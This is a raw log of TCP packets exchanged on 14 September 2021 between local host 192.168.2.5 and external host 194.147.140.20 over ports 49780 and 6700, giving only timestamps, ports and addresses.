Sep 14, 2021 17:03:45.651655912 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.651686907 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.651838064 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.651865959 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.651905060 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.651922941 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.652004957 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.652029037 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.652096033 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.652393103 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.652417898 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.652443886 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.652462959 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.652544022 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.652589083 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.652641058 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.652704954 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.652781963 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.652903080 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.838195086 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.838274956 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.838306904 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.838357925 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.838406086 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.838522911 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.838637114 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.838679075 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.838715076 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.838781118 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.838884115 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.838922024 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.838994026 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.839006901 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.839045048 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.839077950 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.839123011 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.839112043 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.839134932 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.839200020 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.839276075 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.839363098 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.839456081 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.839487076 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.839540958 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.840022087 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.840080023 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.840132952 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.840137005 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.840189934 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.840234995 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.840279102 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.840289116 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.840295076 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.840358019 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.840379000 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.840415955 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.840565920 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.840744972 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.840775013 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.840801001 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.840802908 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.840852022 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.840856075 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.840910912 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.840922117 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841074944 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841185093 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841208935 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.841213942 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841239929 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841262102 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.841265917 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841291904 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841319084 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841322899 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.841346979 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841412067 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.841423988 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841454029 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841476917 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841502905 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841523886 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.841548920 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.841592073 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841645956 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.841860056 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841887951 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841911077 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841934919 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.841939926 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.841978073 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.841985941 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.842031956 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.842082977 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:45.842122078 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:45.895003080 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.028346062 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.028378010 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.028395891 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.028413057 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.028429031 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.028572083 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.029083967 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.029232025 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.029993057 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.030141115 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.030225992 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.030262947 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.030386925 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.030456066 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.030560017 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.030579090 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.030683041 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.030713081 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.030733109 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.030819893 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.030834913 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.031171083 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.031189919 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.031255007 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.031289101 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.031378031 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.031410933 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.031430960 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.031507015 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.031719923 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032475948 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032499075 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032515049 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032531023 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032550097 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032569885 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032581091 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.032588005 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032604933 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032624006 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032643080 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032664061 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032681942 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032701969 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.032731056 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032736063 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.032751083 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032783031 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.032877922 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032957077 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.032963037 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.032982111 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.033080101 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.033127069 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.033185959 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.033245087 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.033268929 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.033369064 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.033454895 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.033488035 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.033515930 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.033577919 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.033658028 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.033768892 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.033807993 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.033845901 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.033936024 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.034099102 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.034430981 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.035814047 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.035965919 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.084887028 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.129563093 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.146821976 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.217873096 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.217897892 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.217931986 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.217946053 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.218086958 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.218300104 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.218380928 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.218393087 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.218465090 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.219316959 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.219429016 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.219481945 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.219566107 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.219640970 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.219731092 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.219806910 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.219851971 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.219870090 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.219906092 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.219918013 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.219990015 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.220124006 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.220210075 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.220488071 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.220563889 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.220592976 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.220657110 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.220705032 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.220743895 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.220763922 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.220814943 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.220895052 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.220916033 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.220980883 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.222049952 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.222179890 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.222261906 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.222279072 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.222341061 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.225204945 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.225320101 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.226078033 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226099968 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226114988 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226131916 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226146936 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226162910 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226175070 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226191998 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226207018 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226222038 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226237059 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226310015 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226331949 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226356030 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226380110 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226396084 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226413965 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226432085 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226448059 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.226450920 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226464987 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.226469040 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.226471901 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.226471901 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226495028 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226515055 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226530075 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.226536036 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226552963 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226571083 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.226649046 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.226677895 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.320127964 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.320233107 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.381697893 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.407694101 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.407725096 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.407741070 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.407824993 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.407850981 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.407887936 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.407890081 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.407985926 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.408009052 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.408025980 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.408046007 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.408090115 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.408113003 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.408132076 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.408207893 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.408252001 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.408330917 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.408709049 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.408857107 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.408953905 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.409008026 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.409100056 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.409122944 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.409173012 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.409250021 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.409290075 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.409392118 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.409455061 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.409534931 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.409861088 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.409883976 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.409976006 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.410000086 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.410008907 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.410077095 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.410093069 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.410099983 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.410120010 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.410167933 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.410207987 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.410304070 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.410515070 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.410537004 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.410620928 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.410643101 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.410691023 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.410739899 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.410758972 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.410763025 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.410839081 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.410860062 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.410881996 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.410952091 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.410976887 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.411007881 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.411129951 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.411149025 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.411228895 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.411330938 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.411425114 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.411447048 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.411501884 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.411562920 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.411587000 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.411643982 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.411668062 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.411691904 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.411762953 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.414541006 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.414572001 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.414659023 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.416024923 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.416114092 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.416194916 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.416202068 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.416268110 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.416333914 CEST	49780	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:46.416568041 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.416598082 CEST	6700	49780	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:46.416673899 CEST	6700	49780	194.147.140.20	192.168.2.5
